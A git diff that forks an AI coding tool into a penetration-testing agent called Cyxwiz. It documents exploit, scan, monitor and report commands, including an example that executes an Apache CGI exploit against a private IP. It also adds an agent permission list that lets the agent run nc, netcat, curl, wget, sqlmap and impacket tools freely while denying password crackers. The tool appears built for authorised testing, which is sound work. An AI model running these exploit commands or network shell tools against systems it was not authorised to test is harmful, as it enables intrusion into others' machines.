specific CVE +exploits action="search" query="CVE-2021-44228" + +# Suggest exploits for a finding +exploits action="suggest" findingId="finding_abc123" + +# Get exploit details +exploits action="info" module="exploit/linux/http/apache_mod_cgi_bash_env_exec" + +# Check if target is vulnerable +exploits action="check" module="exploit/linux/http/apache_mod_cgi_bash_env_exec" target="192.168.1.10" + +# Execute exploit (dry run) +exploits action="execute" module="exploit/linux/http/apache_mod_cgi_bash_env_exec" target="192.168.1.10" dryRun=true + +# Execute exploit (requires confirmation) +exploits action="execute" module="exploit/linux/http/apache_mod_cgi_bash_env_exec" target="192.168.1.10" options={"RHOSTS":"192.168.1.10","LHOST":"192.168.1.5"} +``` + +--- + +## Monitor - Continuous Monitoring + +Create and manage scheduled security scans with alerting. + +### Actions + +| Action | Description | +|--------|-------------| +| `create` | Create new monitor | +| `list` | List all monitors | +| `get` | Get monitor details | +| `pause` | Pause a monitor | +| `resume` | Resume a monitor | +| `delete` | Delete a monitor | +| `trigger` | Trigger immediate scan | +| `status` | Get scheduler status | + +### Schedule Types + +| Type | Description | +|------|-------------| +| `interval` | Run every N milliseconds | +| `cron` | Cron expression schedule | + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `monitorID` | string | No | Monitor ID for operations | +| `name` | string | No | Monitor name (for create) | +| `description` | string | No | Monitor description | +| `targets` | array | No | Targets to scan | +| `tools` | array | No | Tools to run | +| `scheduleType` | string | No | "interval" or "cron" | +| `intervalMs` | number | No | Interval in milliseconds | +| `cronExpression` | string | No | Cron expression | +| `alertMinSeverity` | string | No | Min severity for alerts | + +### Examples + +``` +# Create daily nmap scan (every 24 hours) +monitor action="create" name="Daily Port Scan" targets=["192.168.1.0/24"] tools=[{"tool":"nmap","args":"-sV"}] scheduleType="interval" intervalMs=86400000 + +# Create vulnerability scan every 6 hours via cron +monitor action="create" name="Vuln Scan" targets=["https://example.com"] tools=[{"tool":"nuclei","args":"-t cves/"}] scheduleType="cron" cronExpression="0 */6 * * *" + +# Create weekly full scan +monitor action="create" name="Weekly Full Scan" targets=["192.168.1.0/24"] tools=[{"tool":"nmap"},{"tool":"nikto"}] scheduleType="cron" cronExpression="0 2 * * 0" alertMinSeverity="medium" + +# List all monitors +monitor action="list" + +# Get monitor details +monitor action="get" monitorID="mon_abc123" + +# Pause a monitor +monitor action="pause" monitorID="mon_abc123" + +# Resume a monitor +monitor action="resume" monitorID="mon_abc123" + +# Trigger immediate scan +monitor action="trigger" monitorID="mon_abc123" + +# Delete a monitor +monitor action="delete" monitorID="mon_abc123" + +# Get scheduler status +monitor action="status" +``` + +### Common Cron Expressions + +| Expression | Description | +|------------|-------------| +| `0 * * * *` | Every hour | +| `0 */6 * * *` | Every 6 hours | +| `0 0 * * *` | Daily at midnight | +| `0 2 * * 0` | Weekly Sunday 2am | +| `0 0 1 * *` | Monthly 1st at midnight | + +--- + +## Report - Report Generation + +Generate security assessment reports in various formats. + +### Report Types + +| Type | Description | +|------|-------------| +| `executive` | High-level summary for management | +| `technical` | Detailed with evidence and remediation | +| `compliance` | Formatted for compliance requirements | +| `full` | Complete report with all data | + +### Output Formats + +| Format | Description | +|--------|-------------| +| `markdown` | Markdown format | +| `html` | HTML format | +| `json` | JSON data export | + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `type` | string | No | Report type (default: full) | +| `format` | string | No | Output format (default: markdown) | +| `title` | string | No | Report title | +| `sessionId` | string | No | Filter by session | +| `scanId` | string | No | Filter by scan | +| `minSeverity` | string | No | Minimum severity to include | +| `outputFile` | string | No | Save to file path | + +### Examples + +``` +# Generate executive summary in HTML +report type="executive" format="html" + +# Full technical report in markdown +report type="technical" format="markdown" + +# Compliance report +report type="compliance" format="html" title="Q1 2024 Security Assessment" + +# Export findings as JSON +report format="json" outputFile="/tmp/findings.json" + +# Report for specific session +report type="full" sessionId="session_abc123" + +# Report with severity filter +report type="technical" minSeverity="high" + +# Save HTML report to file +report type="full" format="html" outputFile="/tmp/security_report.html" +``` + +--- + +## Common Patterns + +### Sequential Workflow + +``` +# 1. Discover targets +netscan action="discover" target="192.168.1.0/24" + +# 2. Scan discovered hosts +netscan action="scan" target="192.168.1.0/24" profile="standard" + +# 3. Deep dive on interesting hosts +sectools tool="nmap" target="192.168.1.10" args="-sV -sC -A" + +# 4. Web scan if web services found +webscan action="full-scan" target="http://192.168.1.10" + +# 5. Check for known CVEs +cve action="search" keyword="apache 2.4.49" + +# 6. Generate report +report type="technical" format="html" +``` + +### Cloud Security Assessment + +``` +# 1. Check prerequisites +cloudscan action="prerequisites" provider="aws" + +# 2. Discover resources +cloudscan action="discover" provider="aws" regions=["us-east-1"] + +# 3. Run security scan +cloudscan action="scan" provider="aws" profile="thorough" + +# 4. Compliance check +cloudscan action="compliance" provider="aws" frameworks=["cis","pci-dss"] + +# 5. Generate report +report type="compliance" format="html" +``` + +### Container Security Pipeline + +``` +# 1. Scan image before deployment +containerscan action="scan-image" image="myapp:v1.0" + +# 2. Generate SBOM +containerscan action="sbom" image="myapp:v1.0" + +# 3. Check runtime security +containerscan action="scan-runtime" + +# 4. Kubernetes audit +containerscan action="scan-cluster" + +# 5. Compliance check +containerscan action="compliance" framework="cis-kubernetes" +``` + +### Continuous Monitoring Setup + +``` +# Create monitors for critical systems +monitor action="create" name="Prod Web Scan" targets=["https://prod.example.com"] tools=[{"tool":"nuclei"}] scheduleType="cron" cronExpression="0 */4 * * *" alertMinSeverity="medium" + +monitor action="create" name="Infra Port Scan" targets=["10.0.0.0/24"] tools=[{"tool":"nmap","args":"-sV -F"}] scheduleType="interval" intervalMs=86400000 + +# Check status +monitor action="status" +``` + +--- + +## Severity Levels + +All tools use consistent severity levels: + +| Level | Description | +|-------|-------------| +| `critical` | Immediate exploitation risk | +| `high` | Serious vulnerability | +| `medium` | Moderate risk | +| `low` | Minor issue | +| `info` | Informational finding | + +--- + +## Notes + +- All tools automatically create findings in the session +- Use `createFindings=false` to disable finding creation +- Results are persisted and can be retrieved later +- Use profiles to balance speed vs thoroughness +- External tools (nmap, nuclei, etc.) must be installed separately +- Cloud scans require appropriate CLI tools and credentials configured diff --git a/docs/USAGE.md b/docs/USAGE.md new file mode 100644 index 00000000000..739505b7b50 --- /dev/null +++ b/docs/USAGE.md @@ -0,0 +1,216 @@ +# Cyxwiz - Usage Guide + +Quick reference for development and running the project. + +--- + +## Prerequisites + +- **Bun** (v1.3.6+) +- **Git** +- **GitHub CLI** (gh) + +--- + +## Initial Setup (Already Done) + +```bash +# Install Bun +curl -fsSL https://bun.sh/install | bash +export PATH="$HOME/.bun/bin:$PATH" + +# Clone the fork +gh repo clone code3hr/opencode /home/mrcj/Desktop/wiz + +# Install dependencies +cd /home/mrcj/Desktop/wiz +bun install + +# Build +cd packages/opencode +bun run build +``` + +--- + +## Running OpenCode (Dev Mode) + +```bash +# Always set PATH first +export PATH="$HOME/.bun/bin:$PATH" + +# Navigate to project +cd /home/mrcj/Desktop/wiz + +# Run TUI +bun run --cwd packages/opencode src/index.ts + +# Run with a specific command +bun run --cwd packages/opencode src/index.ts --help +bun run --cwd packages/opencode src/index.ts --version + +# Run with a message (non-interactive) +bun run --cwd packages/opencode src/index.ts run "your message here" + +# Start headless server +bun run --cwd packages/opencode src/index.ts serve + +# Start web interface +bun run --cwd packages/opencode src/index.ts web +``` + +--- + +## Project Structure + +``` +/home/mrcj/Desktop/wiz/ +├── packages/ +│ ├── opencode/ # Core CLI/TUI (main focus) +│ │ ├── src/ +│ │ │ ├── tool/ # Tool definitions +│ │ │ ├── plugin/ # Plugin system +│ │ │ ├── agent/ # Agent definitions +│ │ │ ├── session/ # Session management +│ │ │ └── ... +│ │ └── bin/ +│ ├── plugin/ # Plugin SDK (@opencode-ai/plugin) +│ ├── sdk/ # Client SDK (@opencode-ai/sdk) +│ ├── console/ # Console app +│ ├── desktop/ # Desktop app +│ └── web/ # Web interface +├── PROJECT.md # Full specification +├── CLAUDE.md # AI context file +├── USAGE.md # This file +└── README.md # OpenCode readme +``` + +--- + +## Key Files for Cyxwiz Development + +| File | Purpose | +|------|---------| +| `packages/opencode/src/tool/tool.ts` | Base tool definition | +| `packages/opencode/src/tool/bash.ts` | Bash command execution | +| `packages/opencode/src/plugin/index.ts` | Plugin loader | +| `packages/plugin/src/index.ts` | Hook definitions (lines 176-187) | +| `packages/opencode/src/agent/` | Agent configurations | +| `packages/opencode/src/config/` | Configuration system | + +--- + +## Git Workflow + +```bash +# Always use bun in PATH for hooks +export PATH="$HOME/.bun/bin:$PATH" + +# Check status +cd /home/mrcj/Desktop/wiz +git status + +# Commit changes +git add . +git commit -m "Your message" + +# Push to your fork +git push origin dev + +# Pull latest from upstream (original OpenCode) +git fetch upstream +git merge upstream/dev +``` + +--- + +## Development Commands + +```bash +# From project root +cd /home/mrcj/Desktop/wiz + +# Install dependencies +bun install + +# Type check all packages +bun run typecheck + +# Build opencode package +cd packages/opencode +bun run build + +# Run tests (in opencode package) +bun test + +# Run dev mode +bun run dev +``` + +--- + +## Adding Governance (Phase 2) + +Location for new governance module: +``` +packages/opencode/src/governance/ +├── index.ts # Main exports +├── scope.ts # Scope checking +├── policy.ts # Policy enforcement +├── audit.ts # Audit logging +└── types.ts # TypeScript types +``` + +Hook integration point: +```typescript +// packages/plugin/src/index.ts (lines 176-187) + +"tool.execute.before"?: ( + input: { tool: string; sessionID: string; callID: string }, + output: { args: any }, +) => Promise + +"tool.execute.after"?: ( + input: { tool: string; sessionID: string; callID: string }, + output: { title: string; output: string; metadata: any }, +) => Promise +``` + +--- + +## Troubleshooting + +### "bun: command not found" +```bash +export PATH="$HOME/.bun/bin:$PATH" +``` + +### Pre-push hook fails +```bash +# Run with bun in PATH +export PATH="$HOME/.bun/bin:$PATH" +git push origin dev +``` + +### Permission denied +```bash +# If needed, fix permissions +chmod +x packages/opencode/bin/opencode +``` + +--- + +## Quick Reference + +```bash +# One-liner to start dev +export PATH="$HOME/.bun/bin:$PATH" && cd /home/mrcj/Desktop/wiz && bun run --cwd packages/opencode src/index.ts +``` + +--- + +## Links + +- **Fork:** https://github.com/code3hr/opencode +- **Upstream:** https://github.com/anomalyco/opencode +- **OpenCode Docs:** https://opencode.ai/docs/ diff --git a/package.json b/package.json index 9aa069d52cc..0f13d67d025 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "$schema": "https://json.schemastore.org/package.json", - "name": "opencode", + "name": "cyxwiz", "description": "AI-powered development tool", "private": true, "type": "module", @@ -77,7 +77,7 @@ }, "repository": { "type": "git", - "url": "https://github.com/anomalyco/opencode" + "url": "https://github.com/code3hr/opencode" }, "license": "MIT", "prettier": { diff --git a/packages/opencode/bin/opencode b/packages/opencode/bin/cyxwiz similarity index 86% rename from packages/opencode/bin/opencode rename to packages/opencode/bin/cyxwiz index e35cc00944d..00a75805ef3 100755 --- a/packages/opencode/bin/opencode +++ b/packages/opencode/bin/cyxwiz @@ -17,7 +17,7 @@ function run(target) { process.exit(code) } -const envPath = process.env.OPENCODE_BIN_PATH +const envPath = process.env.CYXWIZ_BIN_PATH if (envPath) { run(envPath) } @@ -44,8 +44,8 @@ let arch = archMap[os.arch()] if (!arch) { arch = os.arch() } -const base = "opencode-" + platform + "-" + arch -const binary = platform === "windows" ? "opencode.exe" : "opencode" +const base = "cyxwiz-" + platform + "-" + arch +const binary = platform === "windows" ? "cyxwiz.exe" : "cyxwiz" function findBinary(startDir) { let current = startDir @@ -74,7 +74,7 @@ function findBinary(startDir) { const resolved = findBinary(scriptDir) if (!resolved) { console.error( - 'It seems that your package manager failed to install the right version of the opencode CLI for your platform. You can try manually installing the "' + + 'It seems that your package manager failed to install the right version of the cyxwiz CLI for your platform. You can try manually installing the "' + base + '" package', ) diff --git a/packages/opencode/package.json b/packages/opencode/package.json index b2d5a8c7ba7..7af2ba43e94 100644 --- a/packages/opencode/package.json +++ b/packages/opencode/package.json @@ -1,7 +1,7 @@ { "$schema": "https://json.schemastore.org/package.json", "version": "1.1.21", - "name": "opencode", + "name": "cyxwiz", "type": "module", "license": "MIT", "private": true, @@ -18,7 +18,7 @@ "deploy": "echo 'Deploying application...' && bun run build && echo 'Deployment completed successfully'" }, "bin": { - "opencode": "./bin/opencode" + "cyxwiz": "./bin/cyxwiz" }, "exports": { "./*": "./src/*.ts" @@ -98,6 +98,7 @@ "decimal.js": "10.5.0", "diff": "catalog:", "fuzzysort": "3.1.0", + "glob": "10.4.5", "gray-matter": "4.0.3", "hono": "catalog:", "hono-openapi": "catalog:", @@ -116,6 +117,7 @@ "vscode-jsonrpc": "8.2.1", "web-tree-sitter": "0.25.10", "xdg-basedir": "5.1.0", + "yaml": "2.7.0", "yargs": "18.0.0", "zod": "catalog:", "zod-to-json-schema": "3.24.5" diff --git a/packages/opencode/src/agent/agent.ts b/packages/opencode/src/agent/agent.ts index 64875091916..2a796549c22 100644 --- a/packages/opencode/src/agent/agent.ts +++ b/packages/opencode/src/agent/agent.ts @@ -11,6 +11,7 @@ import PROMPT_COMPACTION from "./prompt/compaction.txt" import PROMPT_EXPLORE from "./prompt/explore.txt" import PROMPT_SUMMARY from "./prompt/summary.txt" import PROMPT_TITLE from "./prompt/title.txt" +import PROMPT_PENTEST from "../pentest/prompt/pentest.txt" import { PermissionNext } from "@/permission/next" import { mergeDeep, pipe, sortBy, values } from "remeda" import { Global } from "@/global" @@ -192,6 +193,82 @@ export namespace Agent { ), prompt: PROMPT_SUMMARY, }, + pentest: { + name: "pentest", + description: `Security testing specialist for penetration testing and vulnerability assessment. Use this agent to scan networks, identify open ports and services, discover security issues, and get remediation recommendations. Supports nmap, nikto, dirb, gobuster, sqlmap, nuclei, and other security tools with governance scope enforcement.`, + permission: PermissionNext.merge( + defaults, + PermissionNext.fromConfig({ + "*": "deny", + nmap: "allow", + sectools: "allow", + bash: { + // Network reconnaissance + "nmap *": "allow", + "ping *": "allow", + "traceroute *": "allow", + "host *": "allow", + "dig *": "allow", + "whois *": "allow", + "nc *": "allow", + "netcat *": "allow", + "ncat *": "allow", + "masscan *": "allow", + // Web scanning + "nikto *": "allow", + "dirb *": "allow", + "gobuster *": "allow", + "ffuf *": "allow", + "wpscan *": "allow", + "whatweb *": "allow", + "wafw00f *": "allow", + // Vulnerability scanning + "nuclei *": "allow", + "searchsploit *": "allow", + // SQL injection + "sqlmap *": "allow", + // SMB/Windows + "enum4linux *": "allow", + "smbclient *": "allow", + "rpcclient *": "allow", + "crackmapexec *": "allow", + "impacket-* *": "allow", + // SSL/TLS + "sslscan *": "allow", + "sslyze *": "allow", + "testssl *": "allow", + // DNS + "dnsenum *": "allow", + "dnsrecon *": "allow", + "fierce *": "allow", + // Other utilities + "curl *": "allow", + "wget *": "allow", + "hashcat *": "deny", // Password cracking - too risky + "john *": "deny", // Password cracking - too risky + "hydra *": "deny", // Brute force - too risky without explicit approval + "*": "ask", + }, + read: "allow", + grep: "allow", + glob: "allow", + webfetch: "allow", + websearch: "allow", + todoread: "deny", + todowrite: "deny", + external_directory: { + [Truncate.DIR]: "allow", + [Truncate.GLOB]: "allow", + }, + }), + user, + ), + prompt: PROMPT_PENTEST, + options: {}, + mode: "subagent", + native: true, + temperature: 0.3, + }, } for (const [key, value] of Object.entries(cfg.agent ?? {})) { diff --git a/packages/opencode/src/cli/cmd/mcp.ts b/packages/opencode/src/cli/cmd/mcp.ts index cdd741fbc75..7e0b46104e8 100644 --- a/packages/opencode/src/cli/cmd/mcp.ts +++ b/packages/opencode/src/cli/cmd/mcp.ts @@ -83,7 +83,7 @@ export const McpListCommand = cmd({ if (servers.length === 0) { prompts.log.warn("No MCP servers configured") - prompts.outro("Add servers with: opencode mcp add") + prompts.outro("Add servers with: cyxwiz mcp add") return } @@ -469,7 +469,7 @@ export const McpAddCommand = cmd({ if (type === "local") { const command = await prompts.text({ message: "Enter command to run", - placeholder: "e.g., opencode x @modelcontextprotocol/server-filesystem", + placeholder: "e.g., cyxwiz x @modelcontextprotocol/server-filesystem", validate: (x) => (x && x.length > 0 ? undefined : "Required"), }) if (prompts.isCancel(command)) throw new UI.CancelledError() diff --git a/packages/opencode/src/cli/cmd/pr.ts b/packages/opencode/src/cli/cmd/pr.ts index d6176572002..522dbbfd923 100644 --- a/packages/opencode/src/cli/cmd/pr.ts +++ b/packages/opencode/src/cli/cmd/pr.ts @@ -5,7 +5,7 @@ import { $ } from "bun" export const PrCommand = cmd({ command: "pr ", - describe: "fetch and checkout a GitHub PR branch, then run opencode", + describe: "fetch and checkout a GitHub PR branch, then run cyxwiz", builder: (yargs) => yargs.positional("number", { type: "number", @@ -63,15 +63,15 @@ export const PrCommand = cmd({ await $`git branch --set-upstream-to=${remoteName}/${headRefName} ${localBranchName}`.nothrow() } - // Check for opencode session link in PR body + // Check for cyxwiz session link in PR body if (prInfo && prInfo.body) { const sessionMatch = prInfo.body.match(/https:\/\/opncd\.ai\/s\/([a-zA-Z0-9_-]+)/) if (sessionMatch) { const sessionUrl = sessionMatch[0] - UI.println(`Found opencode session: ${sessionUrl}`) + UI.println(`Found cyxwiz session: ${sessionUrl}`) UI.println(`Importing session...`) - const importResult = await $`opencode import ${sessionUrl}`.nothrow() + const importResult = await $`cyxwiz import ${sessionUrl}`.nothrow() if (importResult.exitCode === 0) { const importOutput = importResult.text().trim() // Extract session ID from the output (format: "Imported session: ") @@ -88,23 +88,23 @@ export const PrCommand = cmd({ UI.println(`Successfully checked out PR #${prNumber} as branch '${localBranchName}'`) UI.println() - UI.println("Starting opencode...") + UI.println("Starting cyxwiz...") UI.println() - // Launch opencode TUI with session ID if available + // Launch cyxwiz TUI with session ID if available const { spawn } = await import("child_process") - const opencodeArgs = sessionId ? ["-s", sessionId] : [] - const opencodeProcess = spawn("opencode", opencodeArgs, { + const cyxwizArgs = sessionId ? ["-s", sessionId] : [] + const cyxwizProcess = spawn("cyxwiz", cyxwizArgs, { stdio: "inherit", cwd: process.cwd(), }) await new Promise((resolve, reject) => { - opencodeProcess.on("exit", (code) => { + cyxwizProcess.on("exit", (code) => { if (code === 0) resolve() - else reject(new Error(`opencode exited with code ${code}`)) + else reject(new Error(`cyxwiz exited with code ${code}`)) }) - opencodeProcess.on("error", reject) + cyxwizProcess.on("error", reject) }) }, }) diff --git a/packages/opencode/src/cli/cmd/run.ts b/packages/opencode/src/cli/cmd/run.ts index 54248f96f3d..48f7b8e3519 100644 --- a/packages/opencode/src/cli/cmd/run.ts +++ b/packages/opencode/src/cli/cmd/run.ts @@ -27,7 +27,7 @@ const TOOL: Record = { export const RunCommand = cmd({ command: "run [message..]", - describe: "run opencode with a message", + describe: "run cyxwiz with a message", builder: (yargs: Argv) => { return yargs .positional("message", { @@ -81,7 +81,7 @@ export const RunCommand = cmd({ }) .option("attach", { type: "string", - describe: "attach to a running opencode server (e.g., http://localhost:4096)", + describe: "attach to a running cyxwiz server (e.g., http://localhost:4096)", }) .option("port", { type: "number", diff --git a/packages/opencode/src/cli/cmd/serve.ts b/packages/opencode/src/cli/cmd/serve.ts index bee2c8f711f..4ac4ad8721a 100644 --- a/packages/opencode/src/cli/cmd/serve.ts +++ b/packages/opencode/src/cli/cmd/serve.ts @@ -6,14 +6,14 @@ import { Flag } from "../../flag/flag" export const ServeCommand = cmd({ command: "serve", builder: (yargs) => withNetworkOptions(yargs), - describe: "starts a headless opencode server", + describe: "starts a headless cyxwiz server", handler: async (args) => { if (!Flag.OPENCODE_SERVER_PASSWORD) { console.log("Warning: OPENCODE_SERVER_PASSWORD is not set; server is unsecured.") } const opts = await resolveNetworkOptions(args) const server = Server.listen(opts) - console.log(`opencode server listening on http://${server.hostname}:${server.port}`) + console.log(`cyxwiz server listening on http://${server.hostname}:${server.port}`) await new Promise(() => {}) await server.stop() }, diff --git a/packages/opencode/src/cli/cmd/tui/app.tsx b/packages/opencode/src/cli/cmd/tui/app.tsx index 1fea3f4b305..162fce184a5 100644 --- a/packages/opencode/src/cli/cmd/tui/app.tsx +++ b/packages/opencode/src/cli/cmd/tui/app.tsx @@ -221,20 +221,20 @@ function App() { if (!terminalTitleEnabled() || Flag.OPENCODE_DISABLE_TERMINAL_TITLE) return if (route.data.type === "home") { - renderer.setTerminalTitle("OpenCode") + renderer.setTerminalTitle("Cyxwiz") return } if (route.data.type === "session") { const session = sync.session.get(route.data.sessionID) if (!session || SessionApi.isDefaultTitle(session.title)) { - renderer.setTerminalTitle("OpenCode") + renderer.setTerminalTitle("Cyxwiz") return } // Truncate title to 40 chars max const title = session.title.length > 40 ? session.title.slice(0, 37) + "..." : session.title - renderer.setTerminalTitle(`OC | ${title}`) + renderer.setTerminalTitle(`Cyxwiz | ${title}`) } }) diff --git a/packages/opencode/src/cli/cmd/tui/attach.ts b/packages/opencode/src/cli/cmd/tui/attach.ts index 3f9285f631c..d885c56ccd7 100644 --- a/packages/opencode/src/cli/cmd/tui/attach.ts +++ b/packages/opencode/src/cli/cmd/tui/attach.ts @@ -3,7 +3,7 @@ import { tui } from "./app" export const AttachCommand = cmd({ command: "attach ", - describe: "attach to a running opencode server", + describe: "attach to a running cyxwiz server", builder: (yargs) => yargs .positional("url", { diff --git a/packages/opencode/src/cli/cmd/tui/component/logo.tsx b/packages/opencode/src/cli/cmd/tui/component/logo.tsx index 771962b75d1..15e2c5fc685 100644 --- a/packages/opencode/src/cli/cmd/tui/component/logo.tsx +++ b/packages/opencode/src/cli/cmd/tui/component/logo.tsx @@ -1,85 +1,39 @@ -import { TextAttributes, RGBA } from "@opentui/core" -import { For, type JSX } from "solid-js" -import { useTheme, tint } from "@tui/context/theme" - -// Shadow markers (rendered chars in parens): -// _ = full shadow cell (space with bg=shadow) -// ^ = letter top, shadow bottom (▀ with fg=letter, bg=shadow) -// ~ = shadow top only (▀ with fg=shadow) -const SHADOW_MARKER = /[_^~]/ - -const LOGO_LEFT = [` `, `█▀▀█ █▀▀█ █▀▀█ █▀▀▄`, `█__█ █__█ █^^^ █__█`, `▀▀▀▀ █▀▀▀ ▀▀▀▀ ▀~~▀`] - -const LOGO_RIGHT = [` ▄ `, `█▀▀▀ █▀▀█ █▀▀█ █▀▀█`, `█___ █__█ █__█ █^^^`, `▀▀▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀▀▀`] +import { TextAttributes } from "@opentui/core" +import { For } from "solid-js" +import { useTheme } from "@tui/context/theme" + +const LOGO_LEFT = [ + ` _____ ____ __ `, + ` / __\\ \\ / /\\ \\/ / `, + `| (__ \\ V / > < `, + ` \\___| |_| /_/\\_\\ `, +] + +const LOGO_RIGHT = [ + `__ _____ ____`, + `\\ \\ / /_ _|_ /`, + ` \\ \\/\\/ / | | / / `, + ` \\_/\\_/ |___/___|`, +] export function Logo() { const { theme } = useTheme() - const renderLine = (line: string, fg: RGBA, bold: boolean): JSX.Element[] => { - const shadow = tint(theme.background, fg, 0.25) - const attrs = bold ? TextAttributes.BOLD : undefined - const elements: JSX.Element[] = [] - let i = 0 - - while (i < line.length) { - const rest = line.slice(i) - const markerIndex = rest.search(SHADOW_MARKER) - - if (markerIndex === -1) { - elements.push( - - {rest} - , - ) - break - } - - if (markerIndex > 0) { - elements.push( - - {rest.slice(0, markerIndex)} - , - ) - } - - const marker = rest[markerIndex] - switch (marker) { - case "_": - elements.push( - - {" "} - , - ) - break - case "^": - elements.push( - - ▀ - , - ) - break - case "~": - elements.push( - - ▀ - , - ) - break - } - - i += markerIndex + 1 - } - - return elements - } - return ( {(line, index) => ( - {renderLine(line, theme.textMuted, false)} - {renderLine(LOGO_RIGHT[index()], theme.text, true)} + + + {line} + + + + + {LOGO_RIGHT[index()]} + + )} diff --git a/packages/opencode/src/cli/cmd/tui/component/prompt/index.tsx b/packages/opencode/src/cli/cmd/tui/component/prompt/index.tsx index 9ad85d08f0e..b3efdf4cc72 100644 --- a/packages/opencode/src/cli/cmd/tui/component/prompt/index.tsx +++ b/packages/opencode/src/cli/cmd/tui/component/prompt/index.tsx @@ -51,7 +51,7 @@ export type PromptRef = { submit(): void } -const PLACEHOLDERS = ["Fix a TODO in the codebase", "What is the tech stack of this project?", "Fix broken tests"] +const PLACEHOLDERS = ["Scan this project for vulnerabilities", "Audit the authentication flow", "Check for OWASP top 10 issues"] export function Prompt(props: PromptProps) { let input: TextareaRenderable @@ -760,7 +760,7 @@ export function Prompt(props: PromptProps) { flexGrow={1} >

= {
   nord,
   ["one-dark"]: onedark,
   ["osaka-jade"]: osakaJade,
-  opencode,
+  cyxwiz,
   orng,
   ["lucent-orng"]: lucentOrng,
   palenight,
@@ -283,7 +283,7 @@ export const { use: useTheme, provider: ThemeProvider } = createSimpleContext({
     const [store, setStore] = createStore({
       themes: DEFAULT_THEMES,
       mode: kv.get("theme_mode", props.mode),
-      active: (sync.data.config.theme ?? kv.get("theme", "opencode")) as string,
+      active: (sync.data.config.theme ?? kv.get("theme", "cyxwiz")) as string,
       ready: false,
     })
 
@@ -303,7 +303,7 @@ export const { use: useTheme, provider: ThemeProvider } = createSimpleContext({
           )
         })
         .catch(() => {
-          setStore("active", "opencode")
+          setStore("active", "cyxwiz")
         })
         .finally(() => {
           if (store.active !== "system") {
@@ -326,7 +326,7 @@ export const { use: useTheme, provider: ThemeProvider } = createSimpleContext({
             if (store.active === "system") {
               setStore(
                 produce((draft) => {
-                  draft.active = "opencode"
+                  draft.active = "cyxwiz"
                   draft.ready = true
                 }),
               )
@@ -351,7 +351,7 @@ export const { use: useTheme, provider: ThemeProvider } = createSimpleContext({
     })
 
     const values = createMemo(() => {
-      return resolveTheme(store.themes[store.active] ?? store.themes.opencode, store.mode)
+      return resolveTheme(store.themes[store.active] ?? store.themes.cyxwiz, store.mode)
     })
 
     const syntax = createMemo(() => generateSyntax(values()))
diff --git a/packages/opencode/src/cli/cmd/tui/context/theme/opencode.json b/packages/opencode/src/cli/cmd/tui/context/theme/cyxwiz.json
similarity index 100%
rename from packages/opencode/src/cli/cmd/tui/context/theme/opencode.json
rename to packages/opencode/src/cli/cmd/tui/context/theme/cyxwiz.json
diff --git a/packages/opencode/src/cli/cmd/tui/thread.ts b/packages/opencode/src/cli/cmd/tui/thread.ts
index 05714268545..7da4870877e 100644
--- a/packages/opencode/src/cli/cmd/tui/thread.ts
+++ b/packages/opencode/src/cli/cmd/tui/thread.ts
@@ -42,12 +42,12 @@ function createEventSource(client: RpcClient): EventSource {
 
 export const TuiThreadCommand = cmd({
   command: "$0 [project]",
-  describe: "start opencode tui",
+  describe: "start cyxwiz tui",
   builder: (yargs) =>
     withNetworkOptions(yargs)
       .positional("project", {
         type: "string",
-        describe: "path to start opencode in",
+        describe: "path to start cyxwiz in",
       })
       .option("model", {
         type: "string",
diff --git a/packages/opencode/src/cli/cmd/uninstall.ts b/packages/opencode/src/cli/cmd/uninstall.ts
index 62210d57586..4391a18c88b 100644
--- a/packages/opencode/src/cli/cmd/uninstall.ts
+++ b/packages/opencode/src/cli/cmd/uninstall.ts
@@ -23,7 +23,7 @@ interface RemovalTargets {
 
 export const UninstallCommand = {
   command: "uninstall",
-  describe: "uninstall opencode and remove all related files",
+  describe: "uninstall cyxwiz and remove all related files",
   builder: (yargs: Argv) =>
     yargs
       .option("keep-config", {
@@ -54,7 +54,7 @@ export const UninstallCommand = {
     UI.empty()
     UI.println(UI.logo("  "))
     UI.empty()
-    prompts.intro("Uninstall OpenCode")
+    prompts.intro("Uninstall CyxWiz")
 
     const method = await Installation.method()
     prompts.log.info(`Installation method: ${method}`)
@@ -128,11 +128,11 @@ async function showRemovalSummary(targets: RemovalTargets, method: Installation.
 
   if (method !== "curl" && method !== "unknown") {
     const cmds: Record<string, string> = {
-      npm: "npm uninstall -g opencode-ai",
-      pnpm: "pnpm uninstall -g opencode-ai",
-      bun: "bun remove -g opencode-ai",
-      yarn: "yarn global remove opencode-ai",
-      brew: "brew uninstall opencode",
+      npm: "npm uninstall -g cyxwiz",
+      pnpm: "pnpm uninstall -g cyxwiz",
+      bun: "bun remove -g cyxwiz",
+      yarn: "yarn global remove cyxwiz",
+      brew: "brew uninstall cyxwiz",
     }
     prompts.log.info(`  ✓ Package: ${cmds[method] || method}`)
   }
@@ -177,11 +177,11 @@ async function executeUninstall(method: Installation.Method, targets: RemovalTar
 
   if (method !== "curl" && method !== "unknown") {
     const cmds: Record<string, string[]> = {
-      npm: ["npm", "uninstall", "-g", "opencode-ai"],
-      pnpm: ["pnpm", "uninstall", "-g", "opencode-ai"],
-      bun: ["bun", "remove", "-g", "opencode-ai"],
-      yarn: ["yarn", "global", "remove", "opencode-ai"],
-      brew: ["brew", "uninstall", "opencode"],
+      npm: ["npm", "uninstall", "-g", "cyxwiz"],
+      pnpm: ["pnpm", "uninstall", "-g", "cyxwiz"],
+      bun: ["bun", "remove", "-g", "cyxwiz"],
+      yarn: ["yarn", "global", "remove", "cyxwiz"],
+      brew: ["brew", "uninstall", "cyxwiz"],
     }
 
     const cmd = cmds[method]
@@ -204,7 +204,7 @@ async function executeUninstall(method: Installation.Method, targets: RemovalTar
     prompts.log.info(`  rm "${targets.binary}"`)
 
     const binDir = path.dirname(targets.binary)
-    if (binDir.includes(".opencode")) {
+    if (binDir.includes(".cyxwiz")) {
       prompts.log.info(`  rmdir "${binDir}" 2>/dev/null`)
     }
   }
@@ -218,7 +218,7 @@ async function executeUninstall(method: Installation.Method, targets: RemovalTar
   }
 
   UI.empty()
-  prompts.log.success("Thank you for using OpenCode!")
+  prompts.log.success("Thank you for using CyxWiz!")
 }
 
 async function getShellConfigFile(): Promise<string | null> {
@@ -257,7 +257,7 @@ async function getShellConfigFile(): Promise<string | null> {
     const content = await Bun.file(file)
       .text()
       .catch(() => "")
-    if (content.includes("# opencode") || content.includes(".opencode/bin")) {
